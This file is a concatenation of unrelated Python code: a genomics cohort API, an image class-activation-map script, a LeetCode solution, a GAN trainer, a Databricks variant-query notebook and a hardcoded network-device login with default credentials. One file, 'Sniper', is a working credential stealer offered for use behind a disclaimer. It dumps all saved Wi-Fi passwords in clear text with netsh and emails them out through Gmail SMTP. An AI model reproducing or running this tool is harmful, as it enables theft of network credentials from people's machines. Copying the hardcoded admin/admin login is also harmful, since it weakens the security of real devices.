bcs = BigQueryCohortSupport(project_id, cohort_settings.dataset_id, cohort_settings.table_id)
bcs.add_cohort_with_sample_barcodes(created_cohort.id, sample_barcodes)
request_finished.send(self)
return Cohort(id=str(created_cohort.id),
name=cohort_name,
last_date_saved=str(datetime.utcnow()),
num_patients=str(len(patient_barcodes)),
num_samples=str(len(sample_barcodes))
)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
DELETE_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True),
token=messages.StringField(2)
)
@endpoints.method(DELETE_RESOURCE, ReturnJSON,
path='delete_cohort', http_method='POST', name='cohorts.delete')
def delete_cohort(self, request):
"""
Deletes a cohort. User must have owner permissions on the cohort.
"""
user_email = None
return_message = None
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
cohort_id = request.get_assigned_value('cohort_id')
if user_email:
django.setup()
try:
django_user = Django_User.objects.get(email=user_email)
user_id = django_user.id
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
request_finished.send(self)
raise endpoints.NotFoundException("%s does not have an entry in the user database." % user_email)
try:
cohort_to_deactivate = Django_Cohort.objects.get(id=cohort_id)
if cohort_to_deactivate.active is True:
cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id)
if cohort_perm.perm == 'OWNER':
cohort_to_deactivate.active = False
cohort_to_deactivate.save()
return_message = 'Cohort %d successfully deactivated.' % cohort_id
else:
return_message = 'You do not have owner permission on cohort %d.' % cohort_id
else:
return_message = "Cohort %d was already deactivated." % cohort_id
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
raise endpoints.NotFoundException(
"Either cohort %d does not have an entry in the database "
"or you do not have owner or reader permissions on this cohort." % cohort_id)
finally:
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Unsuccessful authentication.")
return ReturnJSON(msg=return_message)
POST_RESOURCE = endpoints.ResourceContainer(IncomingMetadataItem)
@endpoints.method(POST_RESOURCE, CohortPatientsSamplesList,
path='preview_cohort', http_method='POST', name='cohorts.preview')
def preview_cohort(self, request):
"""
Takes a JSON object of filters in the request body and returns a "preview" of the cohort that would
result from passing a similar request to the cohort **save** endpoint. This preview consists of
        two lists: the list of participant (aka patient) barcodes and the list of sample barcodes.
Authentication is not required.
"""
# print >> sys.stderr,'Called '+sys._getframe().f_code.co_name
patient_cursor = None
sample_cursor = None
db = None
query_dict = {
k.name: request.get_assigned_value(k.name)
for k in request.all_fields()
if request.get_assigned_value(k.name)
}
if are_there_bad_keys(request) or are_there_no_acceptable_keys(request):
err_msg = construct_parameter_error_message(request, True)
raise endpoints.BadRequestException(err_msg)
patient_query_str = 'SELECT DISTINCT(IF(ParticipantBarcode="", LEFT(SampleBarcode,12), ParticipantBarcode)) ' \
'AS ParticipantBarcode ' \
'FROM metadata_samples '
sample_query_str = 'SELECT SampleBarcode ' \
'FROM metadata_samples '
value_tuple = ()
if len(query_dict) > 0:
where_clause = build_where_clause(query_dict)
patient_query_str += ' WHERE ' + where_clause['query_str']
sample_query_str += ' WHERE ' + where_clause['query_str']
value_tuple = where_clause['value_tuple']
sample_query_str += ' GROUP BY SampleBarcode'
patient_barcodes = []
sample_barcodes = []
try:
db = sql_connection()
patient_cursor = db.cursor(MySQLdb.cursors.DictCursor)
patient_cursor.execute(patient_query_str, value_tuple)
for row in patient_cursor.fetchall():
patient_barcodes.append(row['ParticipantBarcode'])
sample_cursor = db.cursor(MySQLdb.cursors.DictCursor)
sample_cursor.execute(sample_query_str, value_tuple)
for row in sample_cursor.fetchall():
sample_barcodes.append(row['SampleBarcode'])
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException("Error retrieving samples or patients: {}".format(e))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tpatient query: {} {}\n\tsample query: {} {}'\
.format(e, patient_query_str, value_tuple, sample_query_str, value_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error previewing cohort. {}".format(msg))
finally:
if patient_cursor: patient_cursor.close()
if sample_cursor: sample_cursor.close()
if db and db.open: db.close()
return CohortPatientsSamplesList(patients=patient_barcodes,
patient_count=len(patient_barcodes),
samples=sample_barcodes,
sample_count=len(sample_barcodes))
GET_RESOURCE = endpoints.ResourceContainer(cohort_id=messages.IntegerField(1, required=True),
token=messages.StringField(2))
@endpoints.method(GET_RESOURCE, GoogleGenomicsList,
path='google_genomics_from_cohort', http_method='GET', name='cohorts.google_genomics_from_cohort')
def google_genomics_from_cohort(self, request):
"""
Returns a list of Google Genomics dataset and readgroupset ids associated with
all the samples in a specified cohort.
Authentication is required. User must have either READER or OWNER permissions on the cohort.
"""
cursor = None
db = None
user_email = None
cohort_id = request.get_assigned_value('cohort_id')
if are_there_bad_keys(request):
err_msg = construct_parameter_error_message(request, False)
raise endpoints.BadRequestException(err_msg)
if endpoints.get_current_user() is not None:
user_email = endpoints.get_current_user().email()
# users have the option of pasting the access token in the query string
# or in the 'token' field in the api explorer
# but this is not required
access_token = request.get_assigned_value('token')
if access_token:
user_email = get_user_email_from_token(access_token)
if user_email:
django.setup()
try:
user_id = Django_User.objects.get(email=user_email).id
django_cohort = Django_Cohort.objects.get(id=cohort_id)
cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id)
except (ObjectDoesNotExist, MultipleObjectsReturned), e:
logger.warn(e)
err_msg = "Error retrieving cohort {} for user {}: {}".format(cohort_id, user_email, e)
if 'Cohort_Perms' in e.message:
err_msg = "User {} does not have permissions on cohort {}. Error: {}"\
.format(user_email, cohort_id, e)
request_finished.send(self)
raise endpoints.UnauthorizedException(err_msg)
query_str = 'SELECT SampleBarcode, GG_dataset_id, GG_readgroupset_id ' \
'FROM metadata_data ' \
'JOIN cohorts_samples ON metadata_data.SampleBarcode=cohorts_samples.sample_id ' \
'WHERE cohorts_samples.cohort_id=%s ' \
'AND GG_dataset_id !="" AND GG_readgroupset_id !="" ' \
'GROUP BY SampleBarcode, GG_dataset_id, GG_readgroupset_id;'
query_tuple = (cohort_id,)
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
google_genomics_items = []
for row in cursor.fetchall():
google_genomics_items.append(
GoogleGenomicsItem(
SampleBarcode=row['SampleBarcode'],
GG_dataset_id=row['GG_dataset_id'],
GG_readgroupset_id=row['GG_readgroupset_id']
)
)
return GoogleGenomicsList(items=google_genomics_items, count=len(google_genomics_items))
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException(
"Google Genomics dataset and readgroupset id's for cohort {} not found."
.format(cohort_id))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tquery: {} {}'\
.format(e, query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving genomics data for cohort. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
request_finished.send(self)
else:
raise endpoints.UnauthorizedException("Authentication failed.")
GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True))
@endpoints.method(GET_RESOURCE, GoogleGenomicsList,
path='google_genomics_from_sample', http_method='GET', name='cohorts.google_genomics_from_sample')
def google_genomics_from_sample(self, request):
"""
Takes a sample barcode as a required parameter and returns the Google Genomics dataset id
and readgroupset id associated with the sample, if any.
"""
# print >> sys.stderr,'Called '+sys._getframe().f_code.co_name
cursor = None
db = None
sample_barcode = request.get_assigned_value('sample_barcode')
if are_there_bad_keys(request):
err_msg = construct_parameter_error_message(request, False)
raise endpoints.BadRequestException(err_msg)
query_str = 'SELECT SampleBarcode, GG_dataset_id, GG_readgroupset_id ' \
'FROM metadata_data ' \
'WHERE SampleBarcode=%s ' \
'AND GG_dataset_id !="" AND GG_readgroupset_id !="" ' \
'GROUP BY SampleBarcode, GG_dataset_id, GG_readgroupset_id;'
query_tuple = (sample_barcode,)
try:
db = sql_connection()
cursor = db.cursor(MySQLdb.cursors.DictCursor)
cursor.execute(query_str, query_tuple)
google_genomics_items = []
for row in cursor.fetchall():
google_genomics_items.append(
GoogleGenomicsItem(
SampleBarcode=row['SampleBarcode'],
GG_dataset_id=row['GG_dataset_id'],
GG_readgroupset_id=row['GG_readgroupset_id']
)
)
return GoogleGenomicsList(items=google_genomics_items, count=len(google_genomics_items))
except (IndexError, TypeError), e:
logger.warn(e)
raise endpoints.NotFoundException(
"Google Genomics dataset and readgroupset id's for sample {} not found."
.format(sample_barcode))
except MySQLdb.ProgrammingError as e:
msg = '{}:\n\tquery: {} {}'\
.format(e, query_str, query_tuple)
logger.warn(msg)
raise endpoints.BadRequestException("Error retrieving genomics data for sample. {}".format(msg))
finally:
if cursor: cursor.close()
if db and db.open: db.close()
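# Sketch (not part of the original service): the open/controlled bucket resolution repeated in
# several endpoints above could be factored into one helper. The name is hypothetical and it
# relies on the module's existing settings import.
def resolve_cloud_storage_path(row):
    """Return a gs:// path for a metadata_data row, or None for an unknown repository."""
    if 'controlled' not in str(row['SecurityProtocol']).lower():
        return "gs://{}{}".format(settings.OPEN_DATA_BUCKET, row.get('DataFileNameKey'))
    if row['Repository'].lower() == 'dcc':
        return "gs://{}{}".format(settings.DCC_CONTROLLED_DATA_BUCKET, row.get('DataFileNameKey'))
    if row['Repository'].lower() == 'cghub':
        return "gs://{}{}".format(settings.CGHUB_CONTROLLED_DATA_BUCKET, row.get('DataFileNameKey'))
    return None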
|
# -*- coding: utf-8 -*-
import keras
import numpy as np
import cv2
import matplotlib.pyplot as plt
from keras.models import Model
from keras.layers import Conv2D
from keras_applications import efficientnet
default_setting = {"backend": keras.backend, "layers": keras.layers,
"models": keras.models, "utils": keras.utils}
def load_img(fname, input_size, preprocess_fn):
original_img = cv2.imread(fname)[:, :, ::-1]
original_size = (original_img.shape[1], original_img.shape[0])
img = cv2.resize(original_img, (input_size, input_size))
imgs = np.expand_dims(preprocess_fn(img), axis=0)
return imgs, original_img, original_size
def postprocess(preds, cams, top_k=1):
    # take the indices of the top_k highest-scoring classes
    idxes = np.argsort(preds[0])[-top_k:]
class_activation_map = np.zeros_like(cams[0, :, :, 0])
for i in idxes:
class_activation_map += cams[0, :, :, i]
class_activation_map[class_activation_map < 0] = 0
class_activation_map = class_activation_map / class_activation_map.max()
return class_activation_map
if __name__ == '__main__':
model = efficientnet.EfficientNetB4(**default_setting)
# model.summary()
input_size = model.layers[0].output_shape[1]
print(input_size)
LAST_CONV_LAYER = 'top_activation'
PRED_LAYER = 'probs'
N_CLASSES = 1000
input_image = "imgs/img2.jpg"
original_img = cv2.imread(input_image)[:, :, ::-1]
original_size = (original_img.shape[1], original_img.shape[0])
img = cv2.resize(original_img, (input_size, input_size))
img = efficientnet.preprocess_input(img, **default_setting)
imgs = np.expand_dims(img, axis=0)
print(imgs.shape)
final_params = model.get_layer(PRED_LAYER).get_weights()
final_params = (final_params[0].reshape(
1, 1, -1, N_CLASSES), final_params[1])
last_conv_output = model.get_layer(LAST_CONV_LAYER).output
x = last_conv_output
x = Conv2D(filters=N_CLASSES, kernel_size=(
1, 1), name='predictions_2')(x)
cam_model = Model(inputs=model.input,
outputs=[model.output, x])
cam_model.get_layer('predictions_2').set_weights(final_params)
preds, cams = cam_model.predict(imgs)
print(preds.shape, cams.shape)
    # 4. post processing
class_activation_map = postprocess(preds, cams, top_k=10)
# 5. plot image+cam to original size
plt.imshow(original_img, alpha=0.5)
plt.imshow(cv2.resize(class_activation_map,
original_size), cmap='jet', alpha=0.5)
plt.show()
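    # Added note (sketch): the load_img helper defined above could replace the inline
    # preprocessing in this block, e.g.:
    #   imgs, original_img, original_size = load_img(
    #       input_image, input_size,
    #       lambda im: efficientnet.preprocess_input(im, **default_setting))
    # and the overlay could be written to disk with plt.savefig("cam_overlay.png")
    # (a hypothetical output path).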
|
import subprocess
import os
import sys
import logging
import time
import email, smtplib, ssl
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
def clear():
os.system('cls')
def begin():
print("Let's Start")
def warn():
clear()
sys.stdout.write(MAGENTA+ '''
_.--""--._
/ _ _ \\
_ ( (_\\ /_) ) _
{ \\._\\ /\\ /_./ }
/_"=-.}______{.-="_\\
_ _.=("""")=._ _
(_'"_.-"***"-._"'_)
{_" " _}
''' + RED + ''' [ Disclaimer Alert ]''' + YELLOW + '''
''' + WHITE + ''' I'm Not Responsible For Misuse ''' + YELLOW + '''
''' + WHITE + ''' or Illegal Purposes.''' + YELLOW + '''
''' + WHITE + ''' Use it just for''' + RED + ''' WORK''' + WHITE + ''' or ''' + RED + '''EDUCATIONAL''' + WHITE + ''' !
''')
def heading():
clear()
sys.stdout.write(RED + '''
`` `` `` ``` `` ` _```..```````'''+RED+'''.hh/ ``` `````.----:::--::- `` `` `` `` ``` `` ```
``` ``` `` `` ``` 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>`` ``` ``` ``` `` `` ``` `
`` `` `` ``` `` `Lxxxxxxx+xxxxxxx++ooo/+oooooooooooooooy> `` `` `` ``` ``` ``` ``` '''+YELLOW+'''
``` `.::-------.. ``` -``` -/mmmmmmmmmmmmmm+++oooosoooooooooooo'''+WHITE+'''///////++++++++++++++++++++++//// `'''+YELLOW+'''
`` `Nmmmmmmmmmmmmmmm//` `` `-:/mmmmmmmmmmmmmmmmmmmmmmmmmm'''+WHITE+'''ooooooooooooooooo//::://::::::::::::::::::-`'''+YELLOW+'''
`` .Nmmmmmmmmmmmmmmmmmm ``+Nmmmmmmmmmmmmmmmmooooooooo/'''+WHITE+''':::::----::----:..``` `` `` ``` `` ``` '''+YELLOW+'''
`-Nmmmmmmmmmmmmmmmmmm/:/xxxxx-`/xx`-xxxxxxxx'''+MAGENTA+''' ``` ``` `` `` `` ``` ``` ``` `` `` ``` `
`` -Nmmmmmmmmmmmmmmmmmmmmmmm``````.-``..` `` `` `` ``` ``` `` `` `` `` ``` `` ```
`:Nmmmmmmmmmmmmmmmmmmmmmm;` `` `` `` ``` ``` `` `` `` ``` ``` ``` `` `` ``` `
`` .Nmmmmmmmmmmmmmmmmmmmmm; `` `` ``` `` `` `` ``` `` `` `` `` `` ``` `` ```
by:''' + WHITE + ' MrAnonymousOfficial (' + YELLOW + '@mr.anonymous_official' + WHITE + ')\n\t\t\t'
'Instagram (' + YELLOW + 'instagram.com/mr.anonymous_official' +WHITE+ ')\n\t\t\t'
'Twitter (' + YELLOW + 'twitter.com/MrAnonymousOfcl' +WHITE+ ')' + '\n''' + END)
print ('\n\t\t {0}[{1}M{0}]{1} Send Passcodes to E-Mail {0}[{1}G{0}]{1} Grab Wi-Fi Password\n\t\t {0}[{1}H{0}]{1} Help\t\t\t{0}[{1}Q{0}]{1} Quit '.format(YELLOW, WHITE) + '\n')
def mailsender():
clear()
subject = "Sniper- Grabbed Wi-Fi Passwords"
body = "This is an email sent from Sniper. Find your grabbed Wi-Fi Passwords in the below attached file. Goodbye. "
sender_email = input("Enter Your E-Mail ID")
password = input("Enter Your Password")
    receiver_email = input("Enter the E-Mail ID of the Receiver")
print ('\n')
print ('[ * * * * * * * * * * * * * * * * * * * * * * * * * ]')
print ('\n email: ' + sender_email)
print (' password: ' + password)
    print (' receive in: ' + receiver_email)
print ('\n[ * * * * * * * * * * * * * * * * * * * * * * * * * ]')
print ('\n')
    ask = input('Is the info above correct? (y/n): ')
if ask == 'y':
pass
else:
mailsender()
message = MIMEMultipart()
message["From"] = sender_email
message["To"] = receiver_email
message["Subject"] = subject
message["Bcc"] = receiver_email
message.attach(MIMEText(body, "plain"))
filename = "Passcode.txt"
with open(filename, "rb") as attachment:
part = MIMEBase("application", "octet-stream")
part.set_payload(attachment.read())
encoders.encode_base64(part)
part.add_header(
"Content-Disposition",
f"attachment; filename= {filename}",
)
message.attach(part)
text = message.as_string()
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, text)
def passwords():
clear()
logging.basicConfig(filename="Passcode.txt", level=logging.DEBUG, format="%(message)s")
data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
for i in profiles:
results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
print(f"{i}:----->{results}")
logging.info(str(f"{i}------>{results}"))
def main():
clear()
warn()
x = input('Do You Agree? (Y/N)')
if x.upper() == 'Y':
pass
else:
print("Goodbye.....see you next time")
sys.exit(0)
begin()
heading()
input('Press ENTER Key to Continue')
while True:
header = ('{0}SNIPER{1} > {2}'.format(YELLOW, WHITE, END))
choice = input(header)
print("You select "+ choice)
if choice.upper() == "Q" or choice.upper() == 'QUIT':
clear()
print("Good bye.......See you Later")
raise SystemExit
elif choice.upper() == 'G' or choice.upper() == 'GRAB':
clear()
print("Please wait.......Grabbing passwords")
if(os.path.isfile('Passcode.txt')):
print("Already File Exists: Do You like to add these details in this file?\n")
x = input("(Y/n)")
if x.upper() == 'Y':
passwords()
print("Succesfully Merged The Details in the file\n")
else:
print("Operation Cancelled\n")
else:
passwords()
print("\n\n\t\t\tYour Requested Wi-Fi Passwords is saved as\n\t\t\t 'Passcode.txt'\n\t\t\tin the same Directory")
elif choice.upper() == 'M' or choice.upper() == 'MAIL':
clear()
print("Please wait.......Starting Mail server")
time.sleep(2)
if(os.path.isfile('Passcode.txt')):
mailsender()
else:
passwords()
mailsender()
elif choice.upper() == 'H' or choice.upper() == 'HELP':
clear()
sys.stdout.write(RED+'''\n\t-----------------------------MANUAL-----------------------------\n
Command \t\t\t\tDetails\n'''+MAGENTA+'''
h'''+BLUE+''' \t\t\tOpens Manual Page\n'''+MAGENTA+'''
m'''+BLUE+''' \t\t\tSends Wi-Fi Passwords to Your E-Mail\n'''+MAGENTA+'''
g'''+BLUE+''' \t\t\tGrabs Wi-Fi Passwords\n'''+MAGENTA+'''
q'''+BLUE+''' \t\t\tQuits This Application\n'''+MAGENTA+'''
help'''+BLUE+'''\t\t\tOpens Manual Page\n'''+MAGENTA+'''
mail'''+BLUE+'''\t\t\tSends Wi-Fi Passwords to Your E-Mail\n'''+MAGENTA+'''
grab'''+BLUE+'''\t\t\tGrabs Wi-Fi Passwords\n'''+MAGENTA+'''
quit'''+BLUE+'''\t\t\tQuits This Application\n'''+RED+'''
------------------------------******------------------------------\n''')
else:
print("No Command Found. Please Enter the Valid Command\n")
if __name__ == "__main__":
main()
|
class Solution:
def reverse(self, x: 'int') -> 'int':
negative_flag = False
if x < 0:
x *= -1
negative_flag = True
num_str = str(x)
s = list(num_str)
s.reverse()
reversed_int = int(''.join(s))
if negative_flag:
result = -1 * reversed_int
else:
result = reversed_int
if -1 * 2**31 <= result < 2 ** 31:
return result
else:
return 0
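# An arithmetic-only variant, added for comparison (a sketch, not part of the original
# solution): it peels digits off with divmod and applies the same 32-bit overflow check.
def reverse_arithmetic(x: int) -> int:
    sign = -1 if x < 0 else 1
    x = abs(x)
    result = 0
    while x:
        x, digit = divmod(x, 10)
        result = result * 10 + digit
    result *= sign
    return result if -2**31 <= result < 2**31 else 0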
s = Solution()
print(s.reverse(123))
print(s.reverse(-123))
print(s.reverse(120))
print(s.reverse(-120))
print(s.reverse(123456789999))
|
# encoding:utf-8
import os
import torch
import torch.nn.functional as F
import torch.optim as optim
import torchvision
from torchvision import transforms as T
from torchvision.datasets import ImageFolder
from torch.autograd import Variable
from torch.utils.data import DataLoader
from models.discriminator import Discriminator
from models.generator import Generator
import time
import visdom
class ModuleTrain:
def __init__(self, opt, best_loss=0.2):
self.opt = opt
        self.best_loss = best_loss  # the model is only saved when the average loss drops below this value
self.netd = Discriminator(self.opt)
self.netg = Generator(self.opt)
self.use_gpu = False
        # load pretrained weights if they exist
if os.path.exists(self.opt.netd_path):
self.load_netd(self.opt.netd_path)
else:
print('[Load model] error: %s not exist !!!' % self.opt.netd_path)
if os.path.exists(self.opt.netg_path):
self.load_netg(self.opt.netg_path)
else:
print('[Load model] error: %s not exist !!!' % self.opt.netg_path)
        # DataLoader initialization
self.transform_train = T.Compose([
T.Resize((self.opt.img_size, self.opt.img_size)),
T.ToTensor(),
T.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]),
])
train_dataset = ImageFolder(root=self.opt.data_path, transform=self.transform_train)
self.train_loader = DataLoader(dataset=train_dataset, batch_size=self.opt.batch_size, shuffle=True,
num_workers=self.opt.num_workers, drop_last=True)
        # optimizers and loss function
# self.optimizer = optim.SGD(self.model.parameters(), lr=self.lr, momentum=0.5)
self.optimizer_g = optim.Adam(self.netg.parameters(), lr=self.opt.lr1, betas=(self.opt.beta1, 0.999))
self.optimizer_d = optim.Adam(self.netd.parameters(), lr=self.opt.lr2, betas=(self.opt.beta1, 0.999))
self.criterion = torch.nn.BCELoss()
self.true_labels = Variable(torch.ones(self.opt.batch_size))
self.fake_labels = Variable(torch.zeros(self.opt.batch_size))
self.fix_noises = Variable(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1))
self.noises = Variable(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1))
# gpu or cpu
if self.opt.use_gpu and torch.cuda.is_available():
self.use_gpu = True
else:
self.use_gpu = False
if self.use_gpu:
print('[use gpu] ...')
self.netd.cuda()
self.netg.cuda()
self.criterion.cuda()
self.true_labels = self.true_labels.cuda()
self.fake_labels = self.fake_labels.cuda()
self.fix_noises = self.fix_noises.cuda()
self.noises = self.noises.cuda()
else:
print('[use cpu] ...')
pass
def train(self, save_best=True):
print('[train] epoch: %d' % self.opt.max_epoch)
for epoch_i in range(self.opt.max_epoch):
loss_netd = 0.0
loss_netg = 0.0
correct = 0
print('================================================')
            for ii, (img, target) in enumerate(self.train_loader):  # training loop
real_img = Variable(img)
                if self.use_gpu:
real_img = real_img.cuda()
                # train the discriminator
if (ii + 1) % self.opt.d_every == 0:
self.optimizer_d.zero_grad()
                    # push the discriminator to label real images as 1
output = self.netd(real_img)
error_d_real = self.criterion(output, self.true_labels)
error_d_real.backward()
                    # push the discriminator to label fake images as 0
self.noises.data.copy_(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1))
                    fake_img = self.netg(self.noises).detach()  # generate fake images from noise
fake_output = self.netd(fake_img)
error_d_fake = self.criterion(fake_output, self.fake_labels)
error_d_fake.backward()
self.optimizer_d.step()
loss_netd += (error_d_real.item() + error_d_fake.item())
                # train the generator
if (ii + 1) % self.opt.g_every == 0:
self.optimizer_g.zero_grad()
self.noises.data.copy_(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1))
fake_img = self.netg(self.noises)
fake_output = self.netd(fake_img)
                    # push the generator to make the discriminator label fakes as 1
error_g = self.criterion(fake_output, self.true_labels)
error_g.backward()
self.optimizer_g.step()
                    loss_netg += error_g.item()
loss_netd /= (len(self.train_loader) * 2)
loss_netg /= len(self.train_loader)
print('[Train] Epoch: {} \tNetD Loss: {:.6f} \tNetG Loss: {:.6f}'.format(epoch_i, loss_netd, loss_netg))
if save_best is True:
if (loss_netg + loss_netd) / 2 < self.best_loss:
self.best_loss = (loss_netg + loss_netd) / 2
                    self.save(self.netd, self.opt.best_netd_path)  # save the best discriminator so far
                    self.save(self.netg, self.opt.best_netg_path)  # save the best generator so far
print('[save best] ...')
# self.vis()
if (epoch_i + 1) % 5 == 0:
self.image_gan()
            self.save(self.netd, self.opt.netd_path)  # save the latest discriminator
            self.save(self.netg, self.opt.netg_path)  # save the latest generator
    def vis(self):
        # fix_noises is stored on self (not on opt); a running visdom server is required
        viz = visdom.Visdom()
        fix_fake_imgs = self.netg(self.fix_noises)
        viz.images(fix_fake_imgs.data.cpu().numpy()[:64] * 0.5 + 0.5, win='fixfake')
def image_gan(self):
noises = torch.randn(self.opt.gen_search_num, self.opt.nz, 1, 1).normal_(self.opt.gen_mean, self.opt.gen_std)
with torch.no_grad():
noises = Variable(noises)
if self.use_gpu:
noises = noises.cuda()
fake_img = self.netg(noises)
scores = self.netd(fake_img).data
indexs = scores.topk(self.opt.gen_num)[1]
result = list()
for ii in indexs:
result.append(fake_img.data[ii])
torchvision.utils.save_image(torch.stack(result), self.opt.gen_img, normalize=True, range=(-1, 1))
# # print(correct)
# # print(len(self.train_loader.dataset))
# train_loss /= len(self.train_loader)
# acc = float(correct) / float(len(self.train_loader.dataset))
# print('[Train] Epoch: {} \tLoss: {:.6f}\tAcc: {:.6f}\tlr: {}'.format(epoch_i, train_loss, acc, self.lr))
#
# test_acc = self.test()
# if save_best is True:
# if test_acc > self.best_acc:
# self.best_acc = test_acc
# str_list = self.model_file.split('.')
# best_model_file = ""
# for str_index in range(len(str_list)):
# best_model_file = best_model_file + str_list[str_index]
# if str_index == (len(str_list) - 2):
# best_model_file += '_best'
# if str_index != (len(str_list) - 1):
# best_model_file += '.'
# self.save(best_model_file) # 保存最好的模型
#
# self.save(self.model_file)
    def test(self):
        # Note: leftover from a classifier trainer; it expects self.test_loader, self.model
        # and self.loss, which this GAN trainer does not define.
        test_loss = 0.0
correct = 0
time_start = time.time()
        # test set
for data, target in self.test_loader:
data, target = Variable(data), Variable(target)
if self.use_gpu:
data = data.cuda()
target = target.cuda()
output = self.model(data)
# sum up batch loss
if self.use_gpu:
loss = self.loss(output, target)
else:
loss = self.loss(output, target)
test_loss += loss.item()
predict = torch.argmax(output, 1)
correct += (predict == target).sum().data
time_end = time.time()
time_avg = float(time_end - time_start) / float(len(self.test_loader.dataset))
test_loss /= len(self.test_loader)
acc = float(correct) / float(len(self.test_loader.dataset))
print('[Test] set: Test loss: {:.6f}\t Acc: {:.6f}\t time: {:.6f} \n'.format(test_loss, acc, time_avg))
return acc
def load_netd(self, name):
print('[Load model netd] %s ...' % name)
self.netd.load_state_dict(torch.load(name))
def load_netg(self, name):
print('[Load model netg] %s ...' % name)
self.netg.load_state_dict(torch.load(name))
def save(self, model, name):
print('[Save model] %s ...' % name)
torch.save(model.state_dict(), name)
# self.model.save(name)
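# Minimal usage sketch (not part of the original project): ModuleTrain only needs an object
# exposing the attributes read above; every path and hyper-parameter below is a placeholder.
if __name__ == '__main__':
    from types import SimpleNamespace
    opt = SimpleNamespace(
        data_path='./data', img_size=96, batch_size=64, num_workers=4, nz=100,
        lr1=2e-4, lr2=2e-4, beta1=0.5, use_gpu=True, max_epoch=200,
        d_every=1, g_every=5,
        netd_path='./checkpoints/netd.pth', netg_path='./checkpoints/netg.pth',
        best_netd_path='./checkpoints/netd_best.pth', best_netg_path='./checkpoints/netg_best.pth',
        gen_search_num=512, gen_num=64, gen_mean=0, gen_std=1, gen_img='./result.png')
    trainer = ModuleTrain(opt)
    trainer.train()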
|
asa_login = {
'host': "192.168.20.17",
"username": "admin",
"password": "admin"
}
|
# Databricks notebook source
# MAGIC %md
# MAGIC ### Query variant database
# MAGIC
# MAGIC 1. point query of specific variants
# MAGIC 2. range query of specific gene
# COMMAND ----------
import pyspark.sql.functions as fx
# COMMAND ----------
variants_df = spark.table("variant_db.exploded")
display(variants_df)
# COMMAND ----------
# MAGIC %md
# MAGIC ##### select random genotype
# COMMAND ----------
def get_random_variant(df, seed=0):
"""
returns a random chromosome, start position and sampleId for querying
"""
row = df.sample(False, 0.1, seed=seed).limit(1).collect()
chrom = row[0].contigName
start = row[0].start
sampleId = row[0].sampleId
return chrom, start, sampleId
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Select all columns from row of interest
# COMMAND ----------
chrom, start, sampleId = get_random_variant(variants_df, seed=42)
spark.sql("select * from variant_db.exploded where contigName = '{0}' and start == {1} and sampleId = '{2}'".format(chrom, start, sampleId)).collect()
# COMMAND ----------
# MAGIC %md
# MAGIC ##### only retrieve genotype
# COMMAND ----------
chrom, start, sampleId = get_random_variant(variants_df, seed=84)
spark.sql("select `calls` from variant_db.exploded where contigName = '{0}' and start == {1} and sampleId = '{2}'".format(chrom, start, sampleId)).collect()
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ##### Gene based queries
# COMMAND ----------
# MAGIC %md
# MAGIC ##### persist gene coordinates into memory
# COMMAND ----------
genes = spark.sql("select * from variant_db.annotations")
genes.createOrReplaceTempView("genes")
spark.table("genes").persist()
spark.table("genes").count()
# COMMAND ----------
# MAGIC %md
# MAGIC ##### select random gene to query
# COMMAND ----------
genes_overlap_variants_df = genes.hint("range_join", 10). \
join(variants_df,
(variants_df.contigName == genes.contigName) &
(variants_df.start > genes.start) &
(variants_df.start <= genes.end),
"left_semi")
# COMMAND ----------
def get_random_gene(df, seed=0):
"""
returns a random gene for querying
"""
row = df.sample(False, 0.1, seed=seed).limit(1).collect()
gene = row[0].gene
return gene
# COMMAND ----------
gene = get_random_gene(genes_overlap_variants_df, seed=126)
gene
# COMMAND ----------
# MAGIC %md
# MAGIC ##### query all variants in gene
# COMMAND ----------
def get_gene_coords(df, gene):
coords = df.where(fx.col("gene") == gene).collect()[0]
return coords.contigName, coords.start, coords.end
# COMMAND ----------
sampleId = "532"
chrom, gene_start, gene_end = get_gene_coords(spark.table("genes"), gene)
spark.sql("select * from variant_db.exploded where contigName = '{0}' and start >= {1} and end <= {2} and sampleId = '{3}'".format(chrom, gene_start, gene_end, sampleId)).collect()
# COMMAND ----------
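# MAGIC %md
# MAGIC ##### (added sketch) the same gene query via the DataFrame API
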